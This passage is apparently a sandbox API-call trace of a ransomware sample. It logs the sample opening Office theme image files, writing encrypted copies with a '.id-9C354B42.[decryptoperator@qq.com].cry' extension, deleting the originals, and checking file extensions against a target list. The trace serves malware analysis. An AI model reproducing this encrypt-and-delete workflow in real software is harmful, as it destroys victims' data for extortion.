lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x560, lpOverlapped=0x0) returned 1 [0045.624] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.624] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.624] SetEndOfFile (hFile=0x1ac) returned 1 [0045.624] CloseHandle (hObject=0x1ac) returned 1 [0045.624] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.624] SetEndOfFile (hFile=0x190) returned 1 [0045.625] CloseHandle (hObject=0x190) returned 1 [0045.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.625] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 1 [0045.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.626] lstrlenW (lpString=".doc") returned 4 [0045.626] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.626] lstrlenW (lpString=".docx") returned 5 [0045.626] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.626] lstrlenW (lpString=".pdf") returned 4 [0045.626] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.626] lstrlenW (lpString=".xls") returned 4 [0045.626] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.626] lstrlenW (lpString=".xlsx") returned 5 [0045.626] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.626] lstrlenW (lpString=".ppt") returned 4 [0045.626] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.626] lstrlenW (lpString=".zip") returned 4 [0045.626] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.626] lstrlenW (lpString=".rar") returned 4 [0045.626] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.626] lstrlenW (lpString=".bz2") returned 4 [0045.626] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.626] lstrlenW (lpString=".7z") returned 3 [0045.626] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.626] lstrlenW (lpString=".dbf") returned 4 [0045.626] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.626] lstrlenW (lpString=".1cd") returned 4 [0045.626] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.626] lstrlenW (lpString=".jpg") returned 4 [0045.626] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.626] lstrlenW (lpString=".doc") returned 4 [0045.626] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.626] lstrlenW (lpString=".docx") returned 5 [0045.626] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.626] lstrlenW (lpString=".pdf") returned 4 [0045.627] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.627] lstrlenW (lpString=".xls") returned 4 [0045.627] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.627] lstrlenW (lpString=".xlsx") returned 5 [0045.627] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.627] lstrlenW (lpString=".ppt") returned 4 [0045.627] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.627] lstrlenW (lpString=".zip") returned 4 [0045.627] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.627] lstrlenW (lpString=".rar") returned 4 [0045.627] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.627] lstrlenW (lpString=".bz2") returned 4 [0045.627] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.627] lstrlenW (lpString=".7z") returned 3 [0045.627] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.627] lstrlenW (lpString=".dbf") returned 4 [0045.627] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.627] lstrlenW (lpString=".1cd") returned 4 [0045.627] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0045.627] lstrlenW (lpString=".jpg") returned 4 [0045.627] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.627] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.627] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.628] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=11573) returned 1 [0045.628] CloseHandle (hObject=0x190) returned 1 [0045.628] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 0x20 [0045.628] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.628] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.628] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.628] GetLastError () returned 0x0 [0045.628] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x2d35, lpOverlapped=0x0) returned 1 [0045.689] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x2d40, lpOverlapped=0x0) returned 1 [0045.690] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.690] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.690] SetEndOfFile (hFile=0x1ac) returned 1 [0045.690] CloseHandle (hObject=0x1ac) returned 1 [0045.690] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.690] SetEndOfFile (hFile=0x190) returned 1 [0045.691] CloseHandle (hObject=0x190) returned 1 [0045.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.691] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 1 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.692] lstrlenW (lpString=".doc") returned 4 [0045.692] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.692] lstrlenW (lpString=".docx") returned 5 [0045.692] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.692] lstrlenW (lpString=".pdf") returned 4 [0045.692] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.692] lstrlenW (lpString=".xls") returned 4 [0045.692] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.692] lstrlenW (lpString=".xlsx") returned 5 [0045.692] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.692] lstrlenW (lpString=".ppt") returned 4 [0045.692] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.692] lstrlenW (lpString=".zip") returned 4 [0045.692] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.692] lstrlenW (lpString=".rar") returned 4 [0045.692] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.692] lstrlenW (lpString=".bz2") returned 4 [0045.692] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.692] lstrlenW (lpString=".7z") returned 3 [0045.692] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.692] lstrlenW (lpString=".dbf") returned 4 [0045.692] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.692] lstrlenW (lpString=".1cd") returned 4 [0045.692] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.692] lstrlenW (lpString=".jpg") returned 4 [0045.692] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.693] lstrlenW (lpString=".doc") returned 4 [0045.693] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString=".docx") returned 5 [0045.693] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.693] lstrlenW (lpString=".pdf") returned 4 [0045.693] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString=".xls") returned 4 [0045.693] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.693] lstrlenW (lpString=".xlsx") returned 5 [0045.693] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.693] lstrlenW (lpString=".ppt") returned 4 [0045.693] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.693] lstrlenW (lpString=".zip") returned 4 [0045.693] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.693] lstrlenW (lpString=".rar") returned 4 [0045.693] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.693] lstrlenW (lpString=".bz2") returned 4 [0045.693] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString=".7z") returned 3 [0045.693] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.693] lstrlenW (lpString=".dbf") returned 4 [0045.693] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.693] lstrlenW (lpString=".1cd") returned 4 [0045.693] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0045.693] lstrlenW (lpString=".jpg") returned 4 [0045.693] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.693] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.693] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.694] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1339) returned 1 [0045.694] CloseHandle (hObject=0x190) returned 1 [0045.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 0x20 [0045.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.694] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.694] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.710] GetLastError () returned 0x0 [0045.710] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x53b, lpOverlapped=0x0) returned 1 [0047.000] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x540, lpOverlapped=0x0) returned 1 [0047.008] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.009] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.009] SetEndOfFile (hFile=0x1ac) returned 1 [0047.009] CloseHandle (hObject=0x1ac) returned 1 [0047.009] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.009] SetEndOfFile (hFile=0x190) returned 1 [0047.010] CloseHandle (hObject=0x190) returned 1 [0047.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.010] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 1 [0047.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.010] lstrlenW (lpString=".doc") returned 4 [0047.010] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.010] lstrlenW (lpString=".docx") returned 5 [0047.010] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.010] lstrlenW (lpString=".pdf") returned 4 [0047.010] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.011] lstrlenW (lpString=".xls") returned 4 [0047.011] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.011] lstrlenW (lpString=".xlsx") returned 5 [0047.011] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.011] lstrlenW (lpString=".ppt") returned 4 [0047.011] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.011] lstrlenW (lpString=".zip") returned 4 [0047.011] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.011] lstrlenW (lpString=".rar") returned 4 [0047.011] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.011] lstrlenW (lpString=".bz2") returned 4 [0047.011] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.011] lstrlenW (lpString=".7z") returned 3 [0047.011] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.011] lstrlenW (lpString=".dbf") returned 4 [0047.011] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.011] lstrlenW (lpString=".1cd") returned 4 [0047.011] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.011] lstrlenW (lpString=".jpg") returned 4 [0047.011] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.011] lstrlenW (lpString=".doc") returned 4 [0047.011] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.011] lstrlenW (lpString=".docx") returned 5 [0047.011] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.011] lstrlenW (lpString=".pdf") returned 4 [0047.011] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.011] lstrlenW (lpString=".xls") returned 4 [0047.011] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.011] lstrlenW (lpString=".xlsx") returned 5 [0047.011] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.011] lstrlenW (lpString=".ppt") returned 4 [0047.012] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.012] lstrlenW (lpString=".zip") returned 4 [0047.012] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.012] lstrlenW (lpString=".rar") returned 4 [0047.012] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.012] lstrlenW (lpString=".bz2") returned 4 [0047.012] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.012] lstrlenW (lpString=".7z") returned 3 [0047.012] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.012] lstrlenW (lpString=".dbf") returned 4 [0047.012] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.012] lstrlenW (lpString=".1cd") returned 4 [0047.012] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.012] lstrlenW (lpString=".jpg") returned 4 [0047.012] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.012] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0047.012] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.012] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=15737) returned 1 [0047.012] CloseHandle (hObject=0x190) returned 1 [0047.013] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 0x20 [0047.013] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.013] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.013] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0047.013] GetLastError () returned 0x0 [0047.013] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x3d79, lpOverlapped=0x0) returned 1 [0047.090] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, 